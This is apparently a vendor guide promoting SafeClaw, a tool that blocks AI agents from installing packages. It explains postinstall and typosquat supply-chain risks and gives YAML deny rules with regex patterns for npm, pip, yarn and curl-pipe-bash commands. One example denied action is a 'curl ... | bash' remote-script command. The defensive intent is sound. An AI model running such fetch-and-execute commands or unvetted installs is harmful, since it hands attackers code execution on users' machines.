2026-02-05 · Authensor

How to Prevent AI Agents from Installing Malicious Packages

To prevent AI agents from installing malicious npm packages, use SafeClaw action-level gating to block unauthorized shell_exec actions matching npm install, pip install, and other package manager commands. SafeClaw enforces an allowlist of approved packages and denies everything else. Install with npx @authensor/safeclaw.

The Risk

npm packages run arbitrary code during installation via postinstall scripts. A single npm install evil-package executes code on your machine before you ever import it. Malicious packages regularly appear on npm — typosquats of popular libraries, abandoned packages with hijacked maintainer accounts, and dependency confusion attacks targeting private package names.

AI agents are uniquely vulnerable to this. When an agent encounters a missing dependency, it generates an npm install command. The package name comes from the model's training data or from context in the conversation. Hallucinated package names are a known problem — the agent confidently recommends express-validator-utils when the real package is express-validator. The hallucinated name may be registered by an attacker specifically targeting AI-generated install commands.

This is a supply chain attack vector. The postinstall script runs as your user, with full access to your filesystem, environment variables, and network. It can read .env, exfiltrate SSH keys, install a backdoor, or add itself to your shell profile for persistence. By the time you notice, the damage is done.

npm audit only catches known vulnerabilities in existing packages. It doesn't help with brand new malicious packages. Lockfiles don't help when the agent adds new packages.

The One-Minute Fix

Step 1: Install SafeClaw.

npx @authensor/safeclaw

Step 2: Get your free API key at safeclaw.onrender.com (7-day renewable, no credit card).

Step 3: Add this policy rule to block unapproved package installations:

- action: shell_exec
  pattern: "npm install|npm i |yarn add|pip install|gem install|cargo add"
  effect: deny
  reason: "Package installation requires manual approval"

The agent can no longer install packages. When it needs a dependency, it will tell you — and you install it yourself.

Full Policy

name: block-package-installation
version: "1.0"
defaultEffect: deny
rules:
  # Block npm install (all variants)
  - action: shell_exec
    pattern: "npm\\s+(install|i)\\s|npm\\s+(install|i)$"
    effect: deny
    reason: "npm package installation blocked — approve manually"

# Block yarn add
  - action: shell_exec
    pattern: "yarn\\s+add"
    effect: deny
    reason: "yarn package addition blocked — approve manually"

# Block pnpm add
  - action: shell_exec
    pattern: "pnpm\\s+(add|install)"
    effect: deny
    reason: "pnpm package installation blocked — approve manually"

# Block pip install
  - action: shell_exec
    pattern: "pip3?\\s+install"
    effect: deny
    reason: "pip package installation blocked — approve manually"

# Block global installs and scripts
  - action: shell_exec
    pattern: "npx\\s+(?!@authensor)"
    effect: deny
    reason: "npx execution of unknown packages blocked"

# Block curl-pipe-bash patterns
  - action: shell_exec
    pattern: "curl.\\|.sh|wget.\\|.sh|curl.\\|.bash"
    effect: deny
    reason: "Remote script execution blocked"

# Allow safe operations
  - action: shell_exec
    pattern: "npm (test|run|start|build|audit|ls|outdated)|yarn (test|run|build)|node |npx @authensor"
    effect: allow
    reason: "Non-installation npm/yarn operations permitted"

What Gets Blocked

These action requests are DENIED:

{
  "action": "shell_exec",
  "command": "npm install express-validator-utils",
  "agent": "code-assistant",
  "result": "DENIED — npm package installation blocked — approve manually"
}

{
  "action": "shell_exec",
  "command": "pip install request",
  "agent": "python-helper",
  "result": "DENIED — pip package installation blocked — approve manually"
}

{
  "action": "shell_exec",
  "command": "curl -fsSL https://unknown-script.sh | bash",
  "agent": "setup-agent",
  "result": "DENIED — Remote script execution blocked"
}

What Still Works

These safe actions are ALLOWED:

{
  "action": "shell_exec",
  "command": "npm test",
  "agent": "code-assistant",
  "result": "ALLOWED — Non-installation npm/yarn operations permitted"
}

{
  "action": "shell_exec",
  "command": "npm run build",
  "agent": "code-assistant",
  "result": "ALLOWED — Non-installation npm/yarn operations permitted"
}

Your agent can run tests, build projects, start dev servers, and audit dependencies. It just can't add new packages without your approval.

Why Other Approaches Don't Work

npm audit checks for known CVEs in your dependency tree. It doesn't detect brand-new malicious packages. It doesn't run before installation. It can't stop an agent from installing a typosquat that was published an hour ago.

Lockfiles (package-lock.json) freeze existing dependency versions. They don't prevent the agent from adding entirely new packages with npm install new-package, which updates the lockfile.

Docker containers limit the blast radius of a malicious postinstall script, but if your project files are mounted into the container, the script can still access them. And the malicious package is now in your dependency tree.

npm --ignore-scripts prevents postinstall scripts but breaks many legitimate packages that need build steps (node-gyp, esbuild, etc.). It's also a flag the agent would need to include — if it forgets, scripts run.

SafeClaw blocks the install command itself, before npm/pip/yarn ever runs. Sub-millisecond evaluation. Deny-by-default means even package managers you didn't think of are blocked. Every denied action is logged in a tamper-proof audit trail (SHA-256 hash chain). 446 tests, TypeScript strict mode, zero third-party dependencies. 100% open source client under MIT license.

Cross-References

Try SafeClaw

Action-level gating for AI agents. Set it up in your browser in 60 seconds.

$ npx @authensor/safeclaw